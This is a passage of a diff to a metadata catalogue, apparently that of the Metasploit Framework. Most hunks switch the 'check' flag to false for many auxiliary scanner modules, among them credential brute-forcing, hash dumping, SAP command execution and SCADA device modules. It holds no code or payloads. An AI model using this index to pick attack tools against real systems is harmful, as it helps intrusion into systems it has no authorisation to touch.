    "path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnslsnr_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35598,7 +35782,7 @@
    "path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnspoison_checker",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35644,7 +35828,7 @@
    "path": "/modules/auxiliary/scanner/oracle/xdb_sid.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/xdb_sid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35691,7 +35875,7 @@
    "path": "/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/xdb_sid_brute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35728,7 +35912,7 @@
    "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/pcanywhere/pcanywhere_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35765,7 +35949,7 @@
    "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/pcanywhere/pcanywhere_tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35802,7 +35986,7 @@
    "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/pcanywhere/pcanywhere_udp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35840,7 +36024,7 @@
    "path": "/modules/auxiliary/scanner/pop3/pop3_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/pop3/pop3_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35877,7 +36061,7 @@
    "path": "/modules/auxiliary/scanner/pop3/pop3_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/pop3/pop3_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35916,7 +36100,7 @@
    "path": "/modules/auxiliary/scanner/portmap/portmap_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/portmap/portmap_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35953,7 +36137,7 @@
    "path": "/modules/auxiliary/scanner/portscan/ack.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/ack",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35991,7 +36175,7 @@
    "path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/ftpbounce",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36028,7 +36212,7 @@
    "path": "/modules/auxiliary/scanner/portscan/syn.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/syn",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36066,7 +36250,7 @@
    "path": "/modules/auxiliary/scanner/portscan/tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36103,7 +36287,7 @@
    "path": "/modules/auxiliary/scanner/portscan/xmas.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/xmas",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36141,7 +36325,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_dbname_flag_injection",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36178,7 +36362,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36217,7 +36401,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -36254,7 +36438,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_schemadump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36291,7 +36475,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_version",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36340,7 +36524,7 @@
    "path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/canon_iradv_pwd_extract",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36381,7 +36565,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_delete_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_delete_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36422,7 +36606,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_download_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_download_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36463,7 +36647,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_env_vars",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36504,7 +36688,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_list_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_list_dir",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36545,7 +36729,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_list_volumes",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36586,7 +36770,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_ready_message.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_ready_message",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36627,7 +36811,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_upload_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_upload_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36668,7 +36852,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_version_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_version_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36705,7 +36889,7 @@
    "path": "/modules/auxiliary/scanner/quake/server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/quake/server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36832,7 +37016,7 @@
    "path": "/modules/auxiliary/scanner/rdp/rdp_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/rdp/rdp_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36872,7 +37056,7 @@
    "path": "/modules/auxiliary/scanner/redis/file_upload.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/file_upload",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36909,7 +37093,7 @@
    "path": "/modules/auxiliary/scanner/redis/redis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/redis_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -36947,7 +37131,7 @@
    "path": "/modules/auxiliary/scanner/redis/redis_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/redis_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37021,7 +37205,7 @@
    "path": "/modules/auxiliary/scanner/rogue/rogue_send.rb",
    "is_install_path": true,
    "ref_name": "scanner/rogue/rogue_send",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37059,7 +37243,7 @@
    "path": "/modules/auxiliary/scanner/rservices/rexec_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rexec_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37097,7 +37281,7 @@
    "path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rlogin_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37135,7 +37319,7 @@
    "path": "/modules/auxiliary/scanner/rservices/rsh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rsh_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37174,7 +37358,7 @@
    "path": "/modules/auxiliary/scanner/rsync/modules_list.rb",
    "is_install_path": true,
    "ref_name": "scanner/rsync/modules_list",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37222,7 +37406,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_ctc_verb_tampering_user_mgmt",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -37273,7 +37457,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_hostctrl_getcomputersystem",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37321,7 +37505,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_icf_public_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_icf_public_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37367,7 +37551,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_icm_urlscan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37414,7 +37598,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_abaplog",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37457,11 +37641,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-05 21:45:05 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_brute_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37508,7 +37692,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_extractusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37555,7 +37739,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getaccesspoints",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37602,7 +37786,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getenv",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37650,7 +37834,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getlogfiles",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37698,7 +37882,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocesslist",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37745,7 +37929,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocessparameter",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37792,7 +37976,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_instanceproperties",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37840,7 +38024,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listconfigfiles",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37887,7 +38071,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listlogfiles",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37934,7 +38118,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_startprofile",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37981,7 +38165,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38021,7 +38205,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_router_info_request.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_router_info_request",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38100,7 +38284,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_service_discovery.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_service_discovery",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38148,7 +38332,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_smb_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_smb_relay",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38195,7 +38379,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_bapi_user_create1",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38242,7 +38426,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_brute_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -38289,7 +38473,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38336,7 +38520,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38382,7 +38566,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_eps_get_directory_listing",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38431,7 +38615,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_pfl_check_os_file_existence",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38478,7 +38662,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_ping",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38525,7 +38709,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_read_table",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38573,7 +38757,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_rzl_read_dir",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38620,7 +38804,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_susr_rfc_user_interface",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38667,7 +38851,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_sxpg_call_system_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38714,7 +38898,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_sxpg_command_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38763,7 +38947,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_system_info",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38810,7 +38994,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_th_saprel_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38856,7 +39040,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_web_gui_brute_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -38894,7 +39078,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_addp_reboot.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_addp_reboot",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38932,7 +39116,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_addp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_addp_version",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38970,7 +39154,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_realport_serialport_scan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39008,7 +39192,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_realport_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_realport_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39058,7 +39242,7 @@
    "path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/indusoft_ntwebserver_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39096,7 +39280,7 @@
    "path": "/modules/auxiliary/scanner/scada/koyo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/koyo_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39213,7 +39397,7 @@
    "path": "/modules/auxiliary/scanner/scada/modbusdetect.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/modbusdetect",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39252,7 +39436,7 @@
    "path": "/modules/auxiliary/scanner/scada/moxa_discover.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/moxa_discover",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39369,7 +39553,7 @@
    "path": "/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/sielco_winlog_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39406,7 +39590,7 @@
    "path": "/modules/auxiliary/scanner/sip/enumerator.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/enumerator",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39443,7 +39627,7 @@
    "path": "/modules/auxiliary/scanner/sip/enumerator_tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/enumerator_tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39480,7 +39664,7 @@
    "path": "/modules/auxiliary/scanner/sip/options.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/options",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39517,7 +39701,7 @@
    "path": "/modules/auxiliary/scanner/sip/options_tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/options_tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39592,11 +39776,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-10-31 14:15:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/dcomexec.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/dcomexec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -39644,11 +39828,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-10-31 14:15:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/secretsdump.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/secretsdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -39685,11 +39869,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-10-31 14:15:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/wmiexec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -39731,7 +39915,7 @@
    "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_auditor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39770,7 +39954,7 @@
    "path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_dcerpc_auditor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39812,7 +39996,7 @@
    "path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/psexec_loggedin_users",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39849,7 +40033,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb1.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb1",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39886,7 +40070,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb2.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb2",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39929,7 +40113,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enum_gpp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39972,7 +40156,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40011,7 +40195,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40051,7 +40235,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers_domain",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40093,7 +40277,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -40132,7 +40316,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_lookupsid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40181,7 +40365,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_ms17_010",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40269,7 +40453,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40315,7 +40499,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40358,7 +40542,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_ntlm_domain",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40403,7 +40587,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_relay",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40446,7 +40630,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40484,7 +40668,7 @@
    "path": "/modules/auxiliary/scanner/snmp/aix_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/aix_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40522,7 +40706,7 @@
    "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
    "is_install_path": true,
